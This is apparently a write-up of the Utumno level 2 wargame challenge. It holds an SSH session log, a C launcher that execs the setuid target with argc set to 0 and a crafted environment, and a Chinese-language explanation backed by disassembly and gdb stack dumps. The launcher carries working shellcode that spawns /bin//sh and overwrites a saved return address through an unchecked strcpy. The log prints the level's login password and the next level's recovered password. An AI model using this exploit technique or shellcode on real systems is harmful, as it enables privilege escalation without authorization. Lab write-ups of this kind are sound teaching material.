root@today:~# ssh utumno2@178.79.134.250
utumno2@178.79.134.250's password: ceewaceiph
utumno2@melinda:~$ cd /tmp
utumno2@melinda:/tmp$ mkdir utu2
utumno2@melinda:/tmp$ cd utu2
utumno2@melinda:/tmp/utu2$ cat hacker.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * Launcher for the utumno2 exploit.
 *
 * The payload is not passed through argv. Instead the target is execve()d
 * with argc == 0 (argv holds only the terminating NULL), so the target's
 * `cmpl $0x0,0x8(%ebp)` check passes, and with a hand-built environment:
 * the target then reads argv[10], which with argc == 0 is envp[9].
 *
 * Returns: does not return on success (the target image replaces this
 * process); exits with status 1 if execve() itself fails.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    /* argc == 0: an argv consisting of nothing but the NULL terminator. */
    char *no_args[] = { NULL };

    /*
     * envp[0..7] are one-byte empty strings: pure padding so that
     *            argv[10] (argv + 0x28) lands on envp[9].
     * envp[8]    shellcode; the bytes decode to execve("/bin//sh", NULL, NULL)
     *            via int 0x80 (eax = 0xb, ebx -> "/bin//sh", ecx = edx = 0).
     * envp[9]    24 filler bytes to reach the saved return address of the
     *            target's main, then the address of envp[8] (0xffffdfb2)
     *            in little-endian order.
     * NOTE(review): that return address is hard-coded for one exact stack
     * layout; a different environment, program path or address
     * randomisation shifts it and the exploit fails.
     */
    char *crafted_env[] = {
        "", "", "", "", "", "", "", "",
        "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80",
        "UUUUUUUUUUUUUUUUUUUUUUUU\xb2\xdf\xff\xff",
        NULL,
    };

    execve("/utumno/utumno2", no_args, crafted_env);

    /* Only reached when the exec did not happen. */
    perror("execve");
    exit(1);
}
utumno2@melinda:/tmp/utu2$ gcc hacker.c -o hacker -g -m32
utumno2@melinda:/tmp/utu2$ ./hacker
$ whoami
utumno3
$ cat /etc/utumno_pass/utumno3
zuudafiine
$
调用execve是为了自行构造环境变量，并把argc设置为0（arg[]只含一个NULL），从而通过main开头的 `cmpl $0x0,0x8(%ebp)` 检查。
目标程序随后执行：
mov 0xc(%ebp),%eax   ; eax = argv
add $0x28,%eax       ; eax = argv + 10*4，即 &argv[10]
mov (%eax),%eax      ; eax = argv[10]
由于argc为0，argv[0]是NULL，argv[1]起就是envp，所以argv[10]正好是env[9]。
前8个环境变量设置为空串只是占位，使env[8]为shellcode、env[9]为"UUUUUUUUUUUUUUUUUUUUUUUU\xb2\xdf\xff\xff"这个溢出串。
strcpy没有长度检查：24个'U'从缓冲区一直填到保存的返回地址（见下方栈布局），随后的\xb2\xdf\xff\xff把main的返回地址覆盖为shellcode的地址，即env[8]的地址(0xffffdfb2)。
注意：这个地址是硬编码的，只有在栈布局可复现时才有效；环境变量大小、程序路径不同或启用了地址随机化都会使它失效。
< ========================================================== >
┌──────────────────────────────────────────────────────────────────────┐
│0x804845d <main> push %ebp │
│0x804845e <main+1> mov %esp,%ebp │
│0x8048460 <main+3> and $0xfffffff0,%esp │
│0x8048463 <main+6> sub $0x20,%esp │
│0x8048466 <main+9> cmpl $0x0,0x8(%ebp) │
│0x804846a <main+13> je 0x8048484 <main+39> │
│0x804846c <main+15> movl $0x8048540,(%esp) │
│0x8048473 <main+22> call 0x8048320 <puts@plt> │
│0x8048478 <main+27> movl $0x1,(%esp) │
│0x804847f <main+34> call 0x8048340 <exit@plt> │
│0x8048484 <main+39> mov 0xc(%ebp),%eax │
│0x8048487 <main+42> add $0x28,%eax │
│0x804848a <main+45> mov (%eax),%eax │
│0x804848c <main+47> mov %eax,0x4(%esp) │
│0x8048490 <main+51> lea 0x14(%esp),%eax │
│0x8048494 <main+55> mov %eax,(%esp) │
│0x8048497 <main+58> call 0x8048310 <strcpy@plt> │
│0x804849c <main+63> mov $0x0,%eax │
│0x80484a1 <main+68> leave │
│0x80484a2 <main+69> ret │
(gdb) b *main
Breakpoint 1 at 0x804847d: file hacker.c, line 6.
(gdb) run
Starting program: /tmp/utu2/hacker
Breakpoint 1, main (argc=1, argv=0xffffd684) at hacker.c:6
(gdb) c
Continuing.
process 5903 is executing new program: /games/utumno/utumno2
Breakpoint 1, main (argc=0, argv=0xffffdeb4) at utumno2.c:20
(gdb) ni
(gdb) x/14dbx $ebp
0xffffde18: (ebp + 0x00)0x00 0x00 0x00 0x00(push ebp) (ebp + 0x04)0x63 0xda 0xe3 0xf7(next eip)
0xffffde20: (ebp + 0x08)0x00 0x00 0x00 0x00(argc) (ebp + 0x0c)0xb4 0xde 0xff 0xff(argv)
0xffffde28: (ebp + 0x10)0xb8 0xde 0xff 0xff(env)
(gdb) x/48dbx 0xffffdeb4
0xffffdeb4: (argv[0])0x00 0x00 0x00 0x00 (env[0])0xaa 0xdf 0xff 0xff
0xffffdebc: (env[1])0xab 0xdf 0xff 0xff (env[2])0xac 0xdf 0xff 0xff
0xffffdec4: (env[3])0xad 0xdf 0xff 0xff (env[4])0xae 0xdf 0xff 0xff
0xffffdecc: (env[5])0xaf 0xdf 0xff 0xff (env[6])0xb0 0xdf 0xff 0xff
0xffffded4: (env[7])0xb1 0xdf 0xff 0xff (env[8])0xb2 0xdf 0xff 0xff
0xffffdedc: (env[9])0xcb 0xdf 0xff 0xff 0x00 0x00 0x00 0x00
mov 0xc(%ebp),%eax ;eax = (0xffffde24) = 0xffffdeb4
add $0x28,%eax ;eax = 0xffffdeb4 + 0x28 = 0xffffdedc
(gdb) x/24dbx 0xffffdfb2
0xffffdfb2: 0x6a 0x0b 0x58 0x31 0xf6 0x56 0x68 0x2f
0xffffdfba: 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e
0xffffdfc2: 0x89 0xe3 0x31 0xc9 0x89 0xca 0xcd 0x80
(gdb) x/29dbx 0xffffdfcb
0xffffdfcb: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x55
0xffffdfd3: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x55
0xffffdfdb: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x55
0xffffdfe3: 0xb2 0xdf 0xff 0xff 0x00
/** stack frame of utumno2's main, listed from high to low addresses
 * saved eip (4B)   <== overwritten with the address of env[8] (shellcode)
 * saved ebp (4B)
 * align (8B)       (stack alignment padding)
 * main stack (12B)
 * <== buffer (lea 0x14(%esp)); 12 + 8 + 4 = 24 bytes below the saved eip,
 *     hence the 24 'U' bytes before the return address in env[9]
 * main stack (20B)
 */
strcpy(buffer, argv[10])